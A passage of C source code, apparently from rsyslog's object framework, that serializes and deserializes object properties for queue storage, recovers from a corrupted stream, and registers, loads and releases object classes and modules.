SerializeProp(strm_t *pStrm, uchar *pszPropName, propType_t propType, void *pUsr)
{
DEFiRet;
uchar *pszBuf = NULL;
size_t lenBuf = 0;
uchar szBuf[64];
varType_t vType = VARTYPE_NONE;
ISOBJ_TYPE_assert(pStrm, strm);
assert(pszPropName != NULL);
/*dbgprintf("objSerializeProp: strm %p, propName '%s', type %d, pUsr %p\n",
pStrm, pszPropName, propType, pUsr);*/
/* if we have no user pointer, there is no need to write this property.
* TODO: think if that's the righ point of view
* rgerhards, 2008-01-06
*/
if(pUsr == NULL) {
ABORT_FINALIZE(RS_RET_OK);
}
/* TODO: use the stream functions for data conversion here - should be quicker */
switch(propType) {
case PROPTYPE_PSZ:
pszBuf = (uchar*) pUsr;
lenBuf = ustrlen(pszBuf);
vType = VARTYPE_STR;
break;
case PROPTYPE_SHORT:
CHKiRet(srUtilItoA((char*) szBuf, sizeof(szBuf), (long) *((short*) pUsr)));
pszBuf = szBuf;
lenBuf = ustrlen(szBuf);
vType = VARTYPE_NUMBER;
break;
case PROPTYPE_INT:
CHKiRet(srUtilItoA((char*) szBuf, sizeof(szBuf), (long) *((int*) pUsr)));
pszBuf = szBuf;
lenBuf = ustrlen(szBuf);
vType = VARTYPE_NUMBER;
break;
case PROPTYPE_LONG:
CHKiRet(srUtilItoA((char*) szBuf, sizeof(szBuf), *((long*) pUsr)));
pszBuf = szBuf;
lenBuf = ustrlen(szBuf);
vType = VARTYPE_NUMBER;
break;
case PROPTYPE_INT64:
CHKiRet(srUtilItoA((char*) szBuf, sizeof(szBuf), *((int64*) pUsr)));
pszBuf = szBuf;
lenBuf = ustrlen(szBuf);
vType = VARTYPE_NUMBER;
break;
case PROPTYPE_CSTR:
pszBuf = rsCStrGetSzStrNoNULL((cstr_t *) pUsr);
lenBuf = rsCStrLen((cstr_t*) pUsr);
vType = VARTYPE_STR;
break;
case PROPTYPE_SYSLOGTIME:
lenBuf = snprintf((char*) szBuf, sizeof(szBuf), "%d:%d:%d:%d:%d:%d:%d:%d:%d:%c:%d:%d",
((syslogTime_t*)pUsr)->timeType,
((syslogTime_t*)pUsr)->year,
((syslogTime_t*)pUsr)->month,
((syslogTime_t*)pUsr)->day,
((syslogTime_t*)pUsr)->hour,
((syslogTime_t*)pUsr)->minute,
((syslogTime_t*)pUsr)->second,
((syslogTime_t*)pUsr)->secfrac,
((syslogTime_t*)pUsr)->secfracPrecision,
((syslogTime_t*)pUsr)->OffsetMode,
((syslogTime_t*)pUsr)->OffsetHour,
((syslogTime_t*)pUsr)->OffsetMinute);
if(lenBuf > sizeof(szBuf) - 1)
ABORT_FINALIZE(RS_RET_PROVIDED_BUFFER_TOO_SMALL);
vType = VARTYPE_SYSLOGTIME;
pszBuf = szBuf;
break;
case PROPTYPE_NONE:
default:
dbgprintf("invalid PROPTYPE %d\n", propType);
break;
}
/* cookie */
CHKiRet(strm.WriteChar(pStrm, COOKIE_PROPLINE));
/* name */
CHKiRet(strm.Write(pStrm, pszPropName, ustrlen(pszPropName)));
CHKiRet(strm.WriteChar(pStrm, ':'));
/* type */
CHKiRet(strm.WriteLong(pStrm, (int) vType));
CHKiRet(strm.WriteChar(pStrm, ':'));
/* length */
CHKiRet(strm.WriteLong(pStrm, lenBuf));
CHKiRet(strm.WriteChar(pStrm, ':'));
/* data */
CHKiRet(strm.Write(pStrm, (uchar*) pszBuf, lenBuf));
/* trailer */
CHKiRet(strm.WriteChar(pStrm, ':'));
CHKiRet(strm.WriteChar(pStrm, '\n'));
finalize_it:
RETiRet;
}
/* end serialization of an object. The caller receives a
* standard C string, which he must free when no longer needed.
*/
static rsRetVal
EndSerialize(strm_t *pStrm)
{
DEFiRet;
assert(pStrm != NULL);
CHKiRet(strm.WriteChar(pStrm, COOKIE_ENDLINE));
CHKiRet(strm.Write(pStrm, (uchar*) "End\n", sizeof("END\n") - 1));
CHKiRet(strm.WriteChar(pStrm, COOKIE_BLANKLINE));
CHKiRet(strm.WriteChar(pStrm, '\n'));
CHKiRet(strm.RecordEnd(pStrm));
finalize_it:
RETiRet;
}
/* define a helper to make code below a bit cleaner (and quicker to write) */
#define NEXTC CHKiRet(strm.ReadChar(pStrm, &c))/*;dbgprintf("c: %c\n", c)*/
/* de-serialize an embedded, non-octect-counted string. This is useful
* for deserializing the object name inside the header. The string is
* terminated by the first occurence of the ':' character.
* rgerhards, 2008-02-29
*/
static rsRetVal
objDeserializeEmbedStr(cstr_t **ppStr, strm_t *pStrm)
{
DEFiRet;
uchar c;
cstr_t *pStr = NULL;
assert(ppStr != NULL);
CHKiRet(cstrConstruct(&pStr));
NEXTC;
while(c != ':') {
CHKiRet(cstrAppendChar(pStr, c));
NEXTC;
}
cstrFinalize(pStr);
*ppStr = pStr;
finalize_it:
if(iRet != RS_RET_OK && pStr != NULL)
cstrDestruct(&pStr);
RETiRet;
}
/* de-serialize a number */
static rsRetVal objDeserializeNumber(number_t *pNum, strm_t *pStrm)
{
DEFiRet;
number_t i;
int bIsNegative;
uchar c;
assert(pNum != NULL);
NEXTC;
if(c == '-') {
bIsNegative = 1;
NEXTC;
} else {
bIsNegative = 0;
}
/* we check this so that we get more meaningful error codes */
if(!isdigit(c)) ABORT_FINALIZE(RS_RET_INVALID_NUMBER);
i = 0;
while(isdigit(c)) {
i = i * 10 + c - '0';
NEXTC;
}
if(c != ':') ABORT_FINALIZE(RS_RET_INVALID_DELIMITER);
if(bIsNegative)
i *= -1;
*pNum = i;
finalize_it:
RETiRet;
}
/* de-serialize a string, length must be provided but may be 0 */
static rsRetVal objDeserializeStr(cstr_t **ppCStr, int iLen, strm_t *pStrm)
{
DEFiRet;
int i;
uchar c;
cstr_t *pCStr = NULL;
assert(ppCStr != NULL);
assert(iLen >= 0);
CHKiRet(cstrConstruct(&pCStr));
NEXTC;
for(i = 0 ; i < iLen ; ++i) {
CHKiRet(cstrAppendChar(pCStr, c));
NEXTC;
}
cstrFinalize(pCStr);
/* check terminator */
if(c != ':') ABORT_FINALIZE(RS_RET_INVALID_DELIMITER);
*ppCStr = pCStr;
finalize_it:
if(iRet != RS_RET_OK && pCStr != NULL)
cstrDestruct(&pCStr);
RETiRet;
}
/* de-serialize a syslogTime -- rgerhards,2008-01-08 */
#define GETVAL(var) \
CHKiRet(objDeserializeNumber(&l, pStrm)); \
pTime->var = l;
static rsRetVal objDeserializeSyslogTime(syslogTime_t *pTime, strm_t *pStrm)
{
DEFiRet;
number_t l;
uchar c;
assert(pTime != NULL);
GETVAL(timeType);
GETVAL(year);
GETVAL(month);
GETVAL(day);
GETVAL(hour);
GETVAL(minute);
GETVAL(second);
GETVAL(secfrac);
GETVAL(secfracPrecision);
/* OffsetMode is a single character! */
NEXTC; pTime->OffsetMode = c;
NEXTC; if(c != ':') ABORT_FINALIZE(RS_RET_INVALID_DELIMITER);
GETVAL(OffsetHour);
GETVAL(OffsetMinute);
finalize_it:
RETiRet;
}
#undef GETVAL
/* de-serialize an object header
* rgerhards, 2008-01-07
*/
static rsRetVal objDeserializeHeader(uchar *pszRecType, cstr_t **ppstrID, int* poVers, strm_t *pStrm)
{
DEFiRet;
number_t oVers;
uchar c;
assert(ppstrID != NULL);
assert(poVers != NULL);
assert(!strcmp((char*) pszRecType, "Obj") || !strcmp((char*) pszRecType, "OPB"));
/* check header cookie */
NEXTC; if(c != COOKIE_OBJLINE) ABORT_FINALIZE(RS_RET_INVALID_HEADER);
NEXTC; if(c != pszRecType[0]) ABORT_FINALIZE(RS_RET_INVALID_HEADER_RECTYPE);
NEXTC; if(c != pszRecType[1]) ABORT_FINALIZE(RS_RET_INVALID_HEADER_RECTYPE);
NEXTC; if(c != pszRecType[2]) ABORT_FINALIZE(RS_RET_INVALID_HEADER_RECTYPE);
NEXTC; if(c != ':') ABORT_FINALIZE(RS_RET_INVALID_HEADER);
NEXTC; if(c != '1') ABORT_FINALIZE(RS_RET_INVALID_HEADER_VERS);
NEXTC; if(c != ':') ABORT_FINALIZE(RS_RET_INVALID_HEADER_VERS);
/* object type and version */
CHKiRet(objDeserializeEmbedStr(ppstrID, pStrm));
CHKiRet(objDeserializeNumber(&oVers, pStrm));
/* and now we skip over the rest until the delemiting \n */
NEXTC;
while(c != '\n') {
NEXTC;
}
*poVers = oVers;
finalize_it:
RETiRet;
}
/* Deserialize a single property. Pointer must be positioned at begin of line. Whole line
* up until the \n is read.
*/
rsRetVal objDeserializeProperty(var_t *pProp, strm_t *pStrm)
{
DEFiRet;
number_t i;
number_t iLen;
uchar c;
int step = 0; /* which step was successful? */
int64 offs;
assert(pProp != NULL);
/* check cookie */
NEXTC;
if(c != COOKIE_PROPLINE) {
/* oops, we've read one char that does not belong to use - unget it first */
CHKiRet(strm.UnreadChar(pStrm, c));
ABORT_FINALIZE(RS_RET_NO_PROPLINE);
}
/* get the property name first */
CHKiRet(cstrConstruct(&pProp->pcsName));
NEXTC;
while(c != ':') {
CHKiRet(cstrAppendChar(pProp->pcsName, c));
NEXTC;
}
cstrFinalize(pProp->pcsName);
step = 1;
/* property type */
CHKiRet(objDeserializeNumber(&i, pStrm));
pProp->varType = i;
step = 2;
/* size (needed for strings) */
CHKiRet(objDeserializeNumber(&iLen, pStrm));
step = 3;
/* we now need to deserialize the value */
switch(pProp->varType) {
case VARTYPE_STR:
CHKiRet(objDeserializeStr(&pProp->val.pStr, iLen, pStrm));
break;
case VARTYPE_NUMBER:
CHKiRet(objDeserializeNumber(&pProp->val.num, pStrm));
break;
case VARTYPE_SYSLOGTIME:
CHKiRet(objDeserializeSyslogTime(&pProp->val.vSyslogTime, pStrm));
break;
case VARTYPE_NONE:
default:
dbgprintf("invalid VARTYPE %d\n", pProp->varType);
break;
}
step = 4;
/* we should now be at the end of the line. So the next char must be \n */
NEXTC;
if(c != '\n') ABORT_FINALIZE(RS_RET_INVALID_PROPFRAME);
finalize_it:
/* ensure the type of var is reset back to VARTYPE_NONE since
* the deconstruct method of var might free unallocated memory
*/
if(iRet != RS_RET_OK && iRet != RS_RET_NO_PROPLINE) {
if(step <= 2) {
pProp->varType = VARTYPE_NONE;
}
}
if(Debug && iRet != RS_RET_OK && iRet != RS_RET_NO_PROPLINE) {
strm.GetCurrOffset(pStrm, &offs);
dbgprintf("error %d deserializing property name, offset %lld, step %d\n",
iRet, offs, step);
strmDebugOutBuf(pStrm);
if(step >= 1) {
dbgprintf("error property name: '%s'\n", rsCStrGetSzStrNoNULL(pProp->pcsName));
}
if(step >= 2) {
dbgprintf("error var type: '%d'\n", pProp->varType);
}
if(step >= 3) {
dbgprintf("error len: '%d'\n", (int) iLen);
}
if(step >= 4) {
switch(pProp->varType) {
case VARTYPE_STR:
dbgprintf("error data string: '%s'\n",
rsCStrGetSzStrNoNULL(pProp->val.pStr));
break;
case VARTYPE_NUMBER:
dbgprintf("error number: %d\n", (int) pProp->val.num);
break;
case VARTYPE_SYSLOGTIME:
dbgprintf("syslog time was successfully parsed (but "
"is not displayed\n");
break;
case VARTYPE_NONE:
default:
break;
}
}
}
RETiRet;
}
/* de-serialize an object trailer. This does not get any data but checks if the
* format is ok.
* rgerhards, 2008-01-07
*/
static rsRetVal objDeserializeTrailer(strm_t *pStrm)
{
DEFiRet;
uchar c;
/* check header cookie */
NEXTC; if(c != COOKIE_ENDLINE) ABORT_FINALIZE(RS_RET_INVALID_TRAILER);
NEXTC; if(c != 'E') ABORT_FINALIZE(RS_RET_INVALID_TRAILER);
NEXTC; if(c != 'n') ABORT_FINALIZE(RS_RET_INVALID_TRAILER);
NEXTC; if(c != 'd') ABORT_FINALIZE(RS_RET_INVALID_TRAILER);
NEXTC; if(c != '\n') ABORT_FINALIZE(RS_RET_INVALID_TRAILER);
NEXTC; if(c != COOKIE_BLANKLINE) ABORT_FINALIZE(RS_RET_INVALID_TRAILER);
NEXTC; if(c != '\n') ABORT_FINALIZE(RS_RET_INVALID_TRAILER);
finalize_it:
if(Debug && iRet != RS_RET_OK) {
dbgprintf("objDeserializeTrailer fails with %d\n", iRet);
}
RETiRet;
}
/* This method tries to recover a serial store if it got out of sync.
* To do so, it scans the line beginning cookies and waits for the object
* cookie. If that is found, control is returned. If the store is exhausted,
* we will receive an RS_RET_EOF error as part of NEXTC, which will also
* terminate this function. So we may either return with somehting that
* looks like a valid object or end of store.
* rgerhards, 2008-01-07
*/
static rsRetVal objDeserializeTryRecover(strm_t *pStrm)
{
DEFiRet;
uchar c;
int bWasNL;
int bRun;
assert(pStrm != NULL);
bRun = 1;
bWasNL = 0;
while(bRun) {
NEXTC;
if(c == '\n')
bWasNL = 1;
else {
if(bWasNL == 1 && c == COOKIE_OBJLINE)
bRun = 0; /* we found it! */
else
bWasNL = 0;
}
}
CHKiRet(strm.UnreadChar(pStrm, c));
finalize_it:
dbgprintf("deserializer has possibly been able to re-sync and recover, state %d\n", iRet);
RETiRet;
}
/* De-serialize the properties of an object. This includes processing
* of the trailer. Header must already have been processed.
* rgerhards, 2008-01-11
*/
static rsRetVal objDeserializeProperties(obj_t *pObj, rsRetVal (*objSetProperty)(), strm_t *pStrm)
{
DEFiRet;
var_t *pVar = NULL;
ISOBJ_assert(pObj);
ISOBJ_TYPE_assert(pStrm, strm);
CHKiRet(var.Construct(&pVar));
CHKiRet(var.ConstructFinalize(pVar));
iRet = objDeserializeProperty(pVar, pStrm);
while(iRet == RS_RET_OK) {
CHKiRet(objSetProperty(pObj, pVar));
/* re-init var object - TODO: method of var! */
rsCStrDestruct(&pVar->pcsName); /* no longer needed */
if(pVar->varType == VARTYPE_STR) {
if(pVar->val.pStr != NULL)
rsCStrDestruct(&pVar->val.pStr);
}
iRet = objDeserializeProperty(pVar, pStrm);
}
if(iRet != RS_RET_NO_PROPLINE)
FINALIZE;
CHKiRet(objDeserializeTrailer(pStrm)); /* do trailer checks */
finalize_it:
if(pVar != NULL)
var.Destruct(&pVar);
RETiRet;
}
/* De-Serialize an object.
* Params: Pointer to object Pointer (pObj) (like a obj_t**, but can not do that due to compiler warning)
* expected object ID (to check against), a fixup function that can modify the object before it is finalized
* and a user pointer that is to be passed to that function in addition to the object. The fixup function
* pointer may be NULL, in which case none is called.
* The caller must destruct the created object.
* rgerhards, 2008-01-07
*/
static rsRetVal
Deserialize(void *ppObj, uchar *pszTypeExpected, strm_t *pStrm, rsRetVal (*fFixup)(obj_t*,void*), void *pUsr)
{
DEFiRet;
rsRetVal iRetLocal;
obj_t *pObj = NULL;
int oVers = 0; /* keep compiler happy, but it is totally useless but takes up some execution time... */
cstr_t *pstrID = NULL;
objInfo_t *pObjInfo;
assert(ppObj != NULL);
assert(pszTypeExpected != NULL);
ISOBJ_TYPE_assert(pStrm, strm);
/* we de-serialize the header. if all goes well, we are happy. However, if
* we experience a problem, we try to recover. We do this by skipping to
* the next object header. This is defined via the line-start cookies. In
* worst case, we exhaust the queue, but then we receive EOF return state,
* from objDeserializeTryRecover(), what will cause us to ultimately give up.
* rgerhards, 2008-07-08
*/
do {
iRetLocal = objDeserializeHeader((uchar*) "Obj", &pstrID, &oVers, pStrm);
if(iRetLocal != RS_RET_OK) {
dbgprintf("objDeserialize error %d during header processing - trying to recover\n", iRetLocal);
CHKiRet(objDeserializeTryRecover(pStrm));
}
} while(iRetLocal != RS_RET_OK);
if(rsCStrSzStrCmp(pstrID, pszTypeExpected, ustrlen(pszTypeExpected)))
/* TODO: optimize strlen() - caller shall provide */
ABORT_FINALIZE(RS_RET_INVALID_OID);
CHKiRet(FindObjInfo((char*)cstrGetSzStrNoNULL(pstrID), &pObjInfo));
CHKiRet(pObjInfo->objMethods[objMethod_CONSTRUCT](&pObj));
/* we got the object, now we need to fill the properties */
CHKiRet(objDeserializeProperties(pObj, pObjInfo->objMethods[objMethod_SETPROPERTY], pStrm));
/* check if we need to call a fixup function that modifies the object
* before it is finalized. -- rgerhards, 2008-01-13
*/
if(fFixup != NULL)
CHKiRet(fFixup(pObj, pUsr));
/* we have a valid object, let's finalize our work and return */
if(objInfoIsImplemented(pObjInfo, objMethod_CONSTRUCTION_FINALIZER))
CHKiRet(pObjInfo->objMethods[objMethod_CONSTRUCTION_FINALIZER](pObj));
*((obj_t**) ppObj) = pObj;
finalize_it:
if(iRet != RS_RET_OK && pObj != NULL)
free(pObj); /* TODO: check if we can call destructor 2008-01-13 rger */
if(pstrID != NULL)
rsCStrDestruct(&pstrID);
RETiRet;
}
/* De-Serialize an object, with known constructur and destructor. Params like Deserialize().
* Note: this is for the queue subsystem, and optimized for its use.
* rgerhards, 2012-11-03
*/
rsRetVal
objDeserializeWithMethods(void *ppObj, uchar *pszTypeExpected, int lenTypeExpected, strm_t *pStrm,
rsRetVal (*fFixup)(obj_t*,void*), void *pUsr, rsRetVal (*objConstruct)(), rsRetVal (*objConstructFinalize)(),
rsRetVal (*objDeserialize)())
{
DEFiRet;
rsRetVal iRetLocal;
obj_t *pObj = NULL;
int oVers = 0; /* keep compiler happy, but it is totally useless but takes up some execution time... */
cstr_t *pstrID = NULL;
assert(ppObj != NULL);
assert(pszTypeExpected != NULL);
ISOBJ_TYPE_assert(pStrm, strm);
/* we de-serialize the header. if all goes well, we are happy. However, if
* we experience a problem, we try to recover. We do this by skipping to
* the next object header. This is defined via the line-start cookies. In
* worst case, we exhaust the queue, but then we receive EOF return state,
* from objDeserializeTryRecover(), what will cause us to ultimately give up.
* rgerhards, 2008-07-08
*/
do {
iRetLocal = objDeserializeHeader((uchar*) "Obj", &pstrID, &oVers, pStrm);
if(iRetLocal != RS_RET_OK) {
dbgprintf("objDeserialize error %d during header processing - "
"trying to recover\n", iRetLocal);
CHKiRet(objDeserializeTryRecover(pStrm));
}
} while(iRetLocal != RS_RET_OK);
if(rsCStrSzStrCmp(pstrID, pszTypeExpected, lenTypeExpected))
ABORT_FINALIZE(RS_RET_INVALID_OID);
CHKiRet(objConstruct(&pObj));
/* we got the object, now we need to fill the properties */
CHKiRet(objDeserialize(pObj, pStrm));
CHKiRet(objDeserializeTrailer(pStrm)); /* do trailer checks */
/* check if we need to call a fixup function that modifies the object
* before it is finalized. -- rgerhards, 2008-01-13
*/
if(fFixup != NULL)
CHKiRet(fFixup(pObj, pUsr));
/* we have a valid object, let's finalize our work and return */
if(objConstructFinalize != NULL) {
CHKiRet(objConstructFinalize(pObj));
}
*((obj_t**) ppObj) = pObj;
finalize_it:
if(iRet != RS_RET_OK && pObj != NULL)
free(pObj); /* TODO: check if we can call destructor 2008-01-13 rger */
if(pstrID != NULL)
rsCStrDestruct(&pstrID);
if(Debug && iRet != RS_RET_OK) {
dbgprintf("objDeserializeWithMethods fails with %d, stream state:\n", iRet);
strmDebugOutBuf(pStrm);
}
RETiRet;
}
/* This is a dummy deserializer, to be used for the delete queue reader
* specifically. This is kind of a hack, but also to be replace (hopefully) soon
* by totally different code. So let's make it as simple as possible...
* rgerhards, 2012-11-06
*/
rsRetVal
objDeserializeDummy(obj_t __attribute__((unused)) *pObj, strm_t *pStrm)
{
DEFiRet;
var_t *pVar = NULL;
CHKiRet(var.Construct(&pVar));
CHKiRet(var.ConstructFinalize(pVar));
iRet = objDeserializeProperty(pVar, pStrm);
while(iRet == RS_RET_OK) {
/* this loop does actually NOGHTING but read the file... */
/* re-init var object - TODO: method of var! */
rsCStrDestruct(&pVar->pcsName); /* no longer needed */
if(pVar->varType == VARTYPE_STR) {
if(pVar->val.pStr != NULL)
rsCStrDestruct(&pVar->val.pStr);
}
iRet = objDeserializeProperty(pVar, pStrm);
}
finalize_it:
if(iRet == RS_RET_NO_PROPLINE)
iRet = RS_RET_OK; /* NO_PROPLINE is OK and a kind of EOF! */
if(pVar != NULL)
var.Destruct(&pVar);
RETiRet;
}
/* De-Serialize an object property bag. As a property bag contains only partial properties,
* it is not instanciable. Thus, the caller must provide a pointer of an already-instanciated
* object of the correct type.
* Params: Pointer to object (pObj)
* Pointer to be passed to the function
* The caller must destruct the created object.
* rgerhards, 2008-01-07
*/
static rsRetVal
DeserializePropBag(obj_t *pObj, strm_t *pStrm)
{
DEFiRet;
rsRetVal iRetLocal;
cstr_t *pstrID = NULL;
int oVers;
objInfo_t *pObjInfo;
ISOBJ_assert(pObj);
ISOBJ_TYPE_assert(pStrm, strm);
/* we de-serialize the header. if all goes well, we are happy. However, if
* we experience a problem, we try to recover. We do this by skipping to
* the next object header. This is defined via the line-start cookies. In
* worst case, we exhaust the queue, but then we receive EOF return state
* from objDeserializeTryRecover(), what will cause us to ultimately give up.
* rgerhards, 2008-07-08
*/
do {
iRetLocal = objDeserializeHeader((uchar*) "OPB", &pstrID, &oVers, pStrm);
if(iRetLocal != RS_RET_OK) {
dbgprintf("objDeserializePropBag error %d during header - trying to recover\n", iRetLocal);
CHKiRet(objDeserializeTryRecover(pStrm));
}
} while(iRetLocal != RS_RET_OK);
if(rsCStrSzStrCmp(pstrID, pObj->pObjInfo->pszID, pObj->pObjInfo->lenID))
ABORT_FINALIZE(RS_RET_INVALID_OID);
CHKiRet(FindObjInfo((char*)cstrGetSzStrNoNULL(pstrID), &pObjInfo));
/* we got the object, now we need to fill the properties */
CHKiRet(objDeserializeProperties(pObj, pObjInfo->objMethods[objMethod_SETPROPERTY], pStrm));
finalize_it:
if(pstrID != NULL)
rsCStrDestruct(&pstrID);
RETiRet;
}
#undef NEXTC /* undef helper macro */
/* --------------- end object serializiation / deserialization support --------------- */
/* set the object (instance) name
* rgerhards, 2008-01-29
* TODO: change the naming to a rsCStr obj! (faster)
*/
static rsRetVal
SetName(obj_t *pThis, uchar *pszName)
{
DEFiRet;
free(pThis->pszName);
CHKmalloc(pThis->pszName = ustrdup(pszName));
finalize_it:
RETiRet;
}
/* get the object (instance) name
* Note that we use a non-standard calling convention. Thus function must never
* fail, else we run into real big problems. So it must make sure that at least someting
* is returned.
* rgerhards, 2008-01-30
*/
uchar * ATTR_NONNULL()
objGetName(obj_t *const pThis)
{
uchar *ret;
uchar szName[128];
BEGINfunc
ISOBJ_assert(pThis);
if(pThis->pszName == NULL) {
snprintf((char*)szName, sizeof(szName), "%s %p", objGetClassName(pThis), pThis);
SetName(pThis, szName);
/* looks strange, but we NEED to re-check because if there was an
* error in objSetName(), the pointer may still be NULL
*/
if(pThis->pszName == NULL) {
ret = objGetClassName(pThis);
} else {
ret = pThis->pszName;
}
} else {
ret = pThis->pszName;
}
ENDfunc
return ret;
}
/* Find the objInfo object for the current object
* rgerhards, 2008-02-29
*/
static rsRetVal
FindObjInfo(const char *const __restrict__ strOID, objInfo_t **ppInfo)
{
DEFiRet;
int bFound;
int i;
bFound = 0;
i = 0;
while(!bFound && i < OBJ_NUM_IDS) {
if(arrObjInfo[i] != NULL && !strcmp(strOID, (const char*)arrObjInfo[i]->pszID)) {
bFound = 1;
break;
}
++i;
}
if(!bFound)
ABORT_FINALIZE(RS_RET_NOT_FOUND);
*ppInfo = arrObjInfo[i];
finalize_it:
if(iRet == RS_RET_OK) {
/* DEV DEBUG ONLY dbgprintf("caller requested object '%s', found at index %d\n", (*ppInfo)->pszID, i);*/
/*EMPTY BY INTENSION*/;
} else {
dbgprintf("caller requested object '%s', not found (iRet %d)\n", strOID, iRet);
}
RETiRet;
}
/* register a classes' info pointer, so that we can reference it later, if needed to
* (e.g. for de-serialization support).
* rgerhards, 2008-01-07
* In this function, we look for a free space in the object table. While we do so, we
* also detect if the same object has already been registered, which is not valid.
* rgerhards, 2008-02-29
*/
static rsRetVal
RegisterObj(uchar *pszObjName, objInfo_t *pInfo)
{
DEFiRet;
int bFound;
int i;
assert(pszObjName != NULL);
assert(pInfo != NULL);
bFound = 0;
i = 0;
while(!bFound && i < OBJ_NUM_IDS && arrObjInfo[i] != NULL) {
if( arrObjInfo[i] != NULL
&& !ustrcmp(arrObjInfo[i]->pszID, pszObjName)) {
bFound = 1;
break;
}
++i;
}
if(bFound) ABORT_FINALIZE(RS_RET_OBJ_ALREADY_REGISTERED);
if(i >= OBJ_NUM_IDS) ABORT_FINALIZE(RS_RET_OBJ_REGISTRY_OUT_OF_SPACE);
arrObjInfo[i] = pInfo;
/* DEV debug only: dbgprintf("object '%s' successfully registered with
index %d, qIF %p\n", pszObjName, i, pInfo->QueryIF); */
finalize_it:
if(iRet != RS_RET_OK) {
LogError(0, NO_ERRCODE, "registering object '%s' failed with error code %d", pszObjName, iRet);
}
RETiRet;
}
/* deregister a classes' info pointer, usually called because the class is unloaded.
* After deregistration, the class can no longer be accessed, except if it is reloaded.
* rgerhards, 2008-03-10
*/
static rsRetVal
UnregisterObj(uchar *pszObjName)
{
DEFiRet;
int bFound;
int i;
assert(pszObjName != NULL);
bFound = 0;
i = 0;
while(!bFound && i < OBJ_NUM_IDS) {
if( arrObjInfo[i] != NULL
&& !ustrcmp(arrObjInfo[i]->pszID, pszObjName)) {
bFound = 1;
break;
}
++i;
}
if(!bFound)
ABORT_FINALIZE(RS_RET_OBJ_NOT_REGISTERED);
InfoDestruct(&arrObjInfo[i]);
/* DEV debug only: dbgprintf("object '%s' successfully unregistered with index %d\n", pszObjName, i); */
finalize_it:
if(iRet != RS_RET_OK) {
dbgprintf("unregistering object '%s' failed with error code %d\n", pszObjName, iRet);
}
RETiRet;
}
/* This function shall be called by anyone who would like to use an object. It will
* try to locate the object, load it into memory if not already present and return
* a pointer to the objects interface.
* rgerhards, 2008-02-29
*/
static rsRetVal
UseObj(const char *srcFile, uchar *pObjName, uchar *pObjFile, interface_t *pIf)
{
DEFiRet;
objInfo_t *pObjInfo;
/* DEV debug only: dbgprintf("source file %s requests object '%s',
ifIsLoaded %d\n", srcFile, pObjName, pIf->ifIsLoaded); */
pthread_mutex_lock(&mutObjGlobalOp);
if(pIf->ifIsLoaded == 1) {
ABORT_FINALIZE(RS_RET_OK); /* we are already set */
}
if(pIf->ifIsLoaded == 2) {
ABORT_FINALIZE(RS_RET_LOAD_ERROR); /* we had a load error and can not continue */
}
/* we must be careful that we do not enter in infinite loop if an error occurs during
* loading a module. ModLoad emits an error message in such cases and that potentially
* can trigger the same code here. So we initially set the module state to "load error"
* and set it to "fully initialized" when the load succeeded. It's a bit hackish, but
* looks like a good solution. -- rgerhards, 2008-03-07
*/
pIf->ifIsLoaded = 2;
iRet = FindObjInfo((const char*)pObjName, &pObjInfo);
if(iRet == RS_RET_NOT_FOUND) {
/* in this case, we need to see if we can dynamically load the object */
if(pObjFile == NULL) {
FINALIZE; /* no chance, we have lost... */
} else {
CHKiRet(module.Load(pObjFile, 0, NULL));
/* NOW, we must find it or we have a problem... */
CHKiRet(FindObjInfo((const char*)pObjName, &pObjInfo));
}
} else if(iRet != RS_RET_OK) {
FINALIZE; /* give up */
}
/* if we reach this point, we have a valid pObjInfo */
if(pObjFile != NULL) { /* NULL means core module */
module.Use(srcFile, pObjInfo->pModInfo); /* increase refcount */
}
CHKiRet(pObjInfo->QueryIF(pIf));
pIf->ifIsLoaded = 1; /* we are happy */
finalize_it:
pthread_mutex_unlock(&mutObjGlobalOp);
RETiRet;
}
/* This function shall be called when a caller is done with an object. Its primary
* purpose is to keep the reference count correct, which is highly important for
* modules residing in loadable modules.
* rgerhards, 2008-03-10
*/
static rsRetVal
ReleaseObj(const char *srcFile, uchar *pObjName, uchar *pObjFile, interface_t *pIf)
{
DEFiRet;
objInfo_t *pObjInfo;
/* dev debug only dbgprintf("source file %s releasing object '%s',
ifIsLoaded %d\n", srcFile, pObjName, pIf->ifIsLoaded); */
pthread_mutex_lock(&mutObjGlobalOp);
if(pObjFile == NULL)
FINALIZE; /* if it is not a lodable module, we do not need to do anything... */
if(pIf->ifIsLoaded == 0) {
FINALIZE; /* we are not loaded - this is perfectly OK... */
} else if(pIf->ifIsLoaded == 2) {
pIf->ifIsLoaded = 0; /* clean up */
FINALIZE; /* we had a load error and can not/must not continue */
}
CHKiRet(FindObjInfo((const char*)pObjName, &pObjInfo));
/* if we reach this point, we have a valid pObjInfo */
module.Release(srcFile, &pObjInfo->pModInfo); /* decrease refcount */
pIf->ifIsLoaded = 0; /* indicated "no longer valid" */
finalize_it:
pthread_mutex_unlock(&mutObjGlobalOp);
RETiRet;
}
/* queryInterface function
* rgerhards, 2008-02-29
*/
PROTOTYPEObjQueryInterface(obj);
BEGINobjQueryInterface(obj)
CODESTARTobjQueryInterface(obj)
if(pIf->ifVersion != objCURR_IF_VERSION) { /* check for current version, increment on each change */
ABORT_FINALIZE(RS_RET_INTERFACE_NOT_SUPPORTED);
}
/* ok, we have the right interface, so let's fill it
* Please note that we may also do some backwards-compatibility
* work here (if we can support an older interface version - that,
* of course, also affects the "if" above).
*/
pIf->UseObj = UseObj;
pIf->ReleaseObj = ReleaseObj;
pIf->InfoConstruct = InfoConstruct;
pIf->DestructObjSelf = DestructObjSelf;
pIf->BeginSerializePropBag = BeginSerializePropBag;
pIf->InfoSetMethod = InfoSetMethod;
pIf->BeginSerialize = BeginSerialize;
pIf->SerializeProp = SerializeProp;
pIf->EndSerialize = EndSerialize;
pIf->RegisterObj = RegisterObj;
pIf->UnregisterObj = UnregisterObj;
pIf->Deserialize = Deserialize;
pIf->DeserializePropBag = DeserializePropBag;
pIf->SetName = SetName;
pIf->GetName = objGetName;
finalize_it:
ENDobjQueryInterface(obj)
/* This function returns a pointer to our own interface. It is used as the
* hook that every object (including dynamically loaded ones) can use to
* obtain a pointer to our interface which than can be used to obtain
* pointers to any other interface in the system. This function must be
* externally visible because of its special nature.
* rgerhards, 2008-02-29 [nice - will have that date the next time in 4 years ;)]
*/
rsRetVal
objGetObjInterface(obj_if_t *pIf)
{
DEFiRet;
assert(pIf != NULL);
objQueryInterface(pIf);
RETiRet;
}
/* exit our class
* rgerhards, 2008-03-11
*/
rsRetVal
objClassExit(void)
{
DEFiRet;
/* release objects we no longer need */
objRelease(strm, CORE_COMPONENT);
objRelease(var, CORE_COMPONENT);
objRelease(module, CORE_COMPONENT);
